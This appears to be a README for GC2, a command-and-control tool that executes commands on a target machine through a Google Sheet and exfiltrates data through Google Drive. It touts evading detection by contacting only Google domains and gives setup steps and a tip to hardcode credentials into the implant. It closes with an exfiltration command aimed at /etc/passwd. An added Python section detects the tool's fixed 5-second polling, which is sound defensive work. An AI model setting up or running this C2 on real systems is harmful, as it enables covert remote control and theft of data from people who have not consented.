GC2 (Google Command and Control) is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrates data using Google Drive.
This program has been developed in order to provide a command and control that does not require any particular set up (like: a custom domain, VPS, CDN, …) during Red Teaming activities.
Furthermore, the program will interact only with Google's domains (*.google.com) to make detection more difficult.
git clone https://github.com/looCiprian/GC2-sheet
go build gc2-sheet.go
Create a new Google “service account”
Create a new Google “service account” using https://console.cloud.google.com/, create a .json key file for the service account
Enable Google Sheet API and Google Drive API
Enable Google Drive API https://developers.google.com/drive/api/v3/enable-drive-api and Google Sheet API https://developers.google.com/sheets/api/quickstart/go
Set up Google Sheet and Google Drive
Create a new Google Sheet and add the service account to the editor group of the spreadsheet (to add the service account use its email)
Create a new Google Drive folder and add the service account to the editor group of the folder (to add the service account use its email)
Start the C2
gc2-sheet --key <GCP service account credential file .JSON > --sheet <Google sheet ID> --drive <Google drive ID>
PS: you can also hardcode the parameters in the code, so you will upload only the executable on the target machine (look at comments in root.go and authentication.go)
- Command execution using Google Sheet as a console
- Download files on the target using Google Drive
- Data exfiltration using Google Drive
- Exit
The program will perform a request to the spreadsheet every 5 sec to check if there are some new commands.
Commands must be inserted in the column “A”, and the output will be printed in the column “B”.
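For defenders, the fixed 5-second poll described above is the most observable trait of this traffic. The following is an added example, not code from the GC2 project: it flags hosts in proxy logs that call a Sheets API host at a steady interval. The log layout, the destination host sheets.googleapis.com, the workstation names and the thresholds are assumptions, and the log lines are constructed.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample, assumed layout: "<ISO time> <source host> <destination host>"
SAMPLE_LOG = """\
2024-05-01T10:00:00 ws-017 sheets.googleapis.com
2024-05-01T10:00:05 ws-017 sheets.googleapis.com
2024-05-01T10:00:10 ws-017 sheets.googleapis.com
2024-05-01T10:00:15 ws-017 sheets.googleapis.com
2024-05-01T10:00:20 ws-017 sheets.googleapis.com
2024-05-01T10:00:25 ws-017 sheets.googleapis.com
2024-05-01T10:00:02 ws-042 sheets.googleapis.com
2024-05-01T10:00:03 ws-042 sheets.googleapis.com
2024-05-01T10:01:40 ws-042 sheets.googleapis.com
2024-05-01T10:07:12 ws-042 sheets.googleapis.com
2024-05-01T10:07:13 ws-042 sheets.googleapis.com
2024-05-01T10:30:00 ws-042 sheets.googleapis.com
"""

WATCHED = {"sheets.googleapis.com"}  # assumption: host the proxy logs for Sheets API calls


def find_pollers(log_text, period=5.0, tolerance=1.0, min_hits=6):
    """Return {source: median_gap} for sources hitting a watched host every ~period seconds."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3 or parts[2] not in WATCHED:
            continue  # skip lines with the wrong shape and unrelated destinations
        seen[parts[1]].append(datetime.fromisoformat(parts[0]))
    flagged = {}
    for src, times in seen.items():
        if len(times) < min_hits:
            continue  # too few requests to judge periodicity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mid = median(gaps)
        # Fixed-interval polling: median gap near the period, most gaps near the median.
        steady = sum(abs(g - mid) <= tolerance for g in gaps) / len(gaps)
        if abs(mid - period) <= tolerance and steady >= 0.8:
            flagged[src] = mid
    return flagged


if __name__ == "__main__":
    for src, gap in find_pollers(SAMPLE_LOG).items():
        print(f"{src}: steady {gap:.0f}s polling of a Sheets API host")
```

Human use of Google Sheets produces bursty, irregular gaps (ws-042 in the sample), so the steadiness ratio separates it from fixed-interval polling; correlating flagged hosts with the originating process on the endpoint narrows results further.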
Data exfiltration file
Special commands are reserved to perform the upload and download to the target machine
From Target to Google Drive
upload;<remote path>
upload;/etc/passwd